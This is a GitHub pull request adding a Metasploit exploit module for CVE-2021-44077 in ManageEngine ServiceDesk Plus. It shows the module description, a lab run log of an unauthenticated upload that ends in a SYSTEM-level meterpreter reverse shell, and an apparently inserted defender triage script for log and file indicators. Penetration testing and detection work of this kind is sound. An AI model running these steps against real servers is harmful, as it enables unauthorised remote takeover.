
Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit #15950

Merged
merged 2 commits into from
Dec 23, 2021

Conversation

wvu
Contributor

@wvu wvu commented Dec 9, 2021

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > info

       Name: ManageEngine ServiceDesk Plus CVE-2021-44077
     Module: exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-09-16

Provided by:
  wvu <wvu@metasploit.com>
  Y4er

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2021-44077, an unauthenticated remote code
  execution vulnerability in ManageEngine ServiceDesk Plus, to upload
  an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that
  build 11305 is vulnerable to the authentication bypass but not the
  file upload. The module will check for an exploitable build.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-44077
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021
  https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
  https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
  https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis
  https://xz.aliyun.com/t/10631

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) >
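The module's metadata above declares two side effects, ioc-in-logs and artifacts-on-disk, and its check looks for the /RestAPI/ImportTechnicians endpoint. The following is an added defender-side triage example, not code from the Metasploit module or from this pull request. It flags requests to that endpoint in a web access log (the log format and the sample lines are constructed), checks for the dropped msiexec.exe in the ServiceDesk Plus bin directory that the module's cleanup warning names, and classifies a build number using only the ranges stated in the referenced advisory titles and the module description (11138 and above for the bypass; 11305 bypass-only). The build boundaries, the install path argument and the function names are this example's assumptions.

```python
"""Defender-side triage for CVE-2021-44077 (ManageEngine ServiceDesk Plus).

Added example; not part of the Metasploit module or the PR. It covers the
two IoCs the module itself declares (ioc-in-logs, artifacts-on-disk):
  1. requests to /RestAPI/ImportTechnicians, the endpoint the module's
     check probes, in a web access log (log format below is constructed);
  2. an unexpected msiexec.exe in <install>/bin, the artifact the module
     warns about ("..\\bin\\msiexec.exe").
It also maps a build number to the module's view of it, using the ranges in
the advisory titles the module references (assumption: 11138 and above carry
the auth bypass; 11305 carries the bypass but not the upload).
"""
import re
from pathlib import Path

TARGET_PATH = "/RestAPI/ImportTechnicians"

# Combined-log-style line; constructed format, adapt to the real server's.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: two benign, two hitting the probed endpoint.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Dec/2021:14:37:40 -0600] "GET /HomePage.do HTTP/1.1" 200 5123
198.51.100.7 - - [23/Dec/2021:14:37:50 -0600] "GET /RestAPI/ImportTechnicians HTTP/1.1" 200 0
198.51.100.7 - - [23/Dec/2021:14:37:52 -0600] "POST /RestAPI/ImportTechnicians?step=1 HTTP/1.1" 200 94
192.0.2.11 - - [23/Dec/2021:14:38:01 -0600] "POST /WorkOrder.do HTTP/1.1" 302 0
"""


def find_import_technicians_hits(log_text):
    """Return (src, method, raw_path, status) for every request to the endpoint.

    The query string is stripped before comparing, so both the GET probe and a
    POST with parameters are reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real triage script would log it
        path = m.group("path").split("?", 1)[0]
        if path.lower() == TARGET_PATH.lower():
            hits.append((m.group("src"), m.group("method"),
                         m.group("path"), int(m.group("status"))))
    return hits


def classify_build(build):
    """Map a ServiceDesk Plus build number to the module's view of it.

    Boundaries are an assumption taken from the advisory titles and the module
    description on this page; builds newer than 11305 are simply out of scope.
    """
    if build < 11138:
        return "not-affected-per-advisory"
    if build == 11305:
        return "auth-bypass-only"
    if build > 11305:
        return "out-of-scope"
    return "auth-bypass-and-upload"


def check_bin_artifact(install_dir):
    """True if msiexec.exe sits in <install>/bin, the dropper's artifact path.

    install_dir is an assumed argument; point it at the real ServiceDesk Plus
    installation root when running this for real.
    """
    return (Path(install_dir) / "bin" / "msiexec.exe").is_file()


if __name__ == "__main__":
    for hit in find_import_technicians_hits(SAMPLE_LOG):
        print("suspicious request:", hit)
    print("build 11305 ->", classify_build(11305))
    print("artifact present:", check_bin_artifact(r"C:\ManageEngine\ServiceDesk"))
```

The log check is deliberately loose (any method, any status) because the module's own check is a plain presence probe of the endpoint; tighten it to POSTs with a 200 once you have confirmed what legitimate traffic to that path looks like in your environment.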

@wvu wvu added the module label Dec 9, 2021
@wvu
Contributor Author

wvu commented Dec 11, 2021

Well, Log4j really blew up. I'll get back to this soon.

@wvu
Contributor Author

wvu commented Dec 20, 2021

Back on this today. :)

@wvu wvu added the docs label Dec 23, 2021
@wvu wvu changed the title [WIP] Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit Dec 23, 2021
@wvu wvu marked this pull request as ready for review December 23, 2021 01:47
@wvu wvu force-pushed the feature/manageengine branch 6 times, most recently from b0f3c69 to a2955b0 Compare December 23, 2021 18:09
@wvu
Contributor Author

wvu commented Dec 23, 2021

All right, I think I'm done making fixes and improvements. 😅

@bwatters-r7
Contributor

Here's an exe, would it be too much trouble to have you execute it as SYSTEM? Sweet, thanks.

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > show options

Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.132.101     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST                        yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Dropper


msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set verbose true
verbose => true
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /RestAPI/ImportTechnicians is present.
[*] Uploading msiexec.exe
[+] Successfully uploaded msiexec.exe
[*] Executing msiexec.exe
[!] Yo, don't forget to clean up ..\bin\msiexec.exe
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:50017 ) at 2021-12-23 14:37:55 -0600

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit b8137d5 into rapid7:master Dec 23, 2021
@bwatters-r7
Contributor

Release Notes

This module exploits CVE-2021-44077, an unauthenticated remote code
execution vulnerability in ManageEngine ServiceDesk Plus, to upload
an EXE (msiexec.exe) and execute it as the SYSTEM account.

@wvu wvu deleted the feature/manageengine branch December 23, 2021 21:05
@erran-r7 erran-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 7, 2022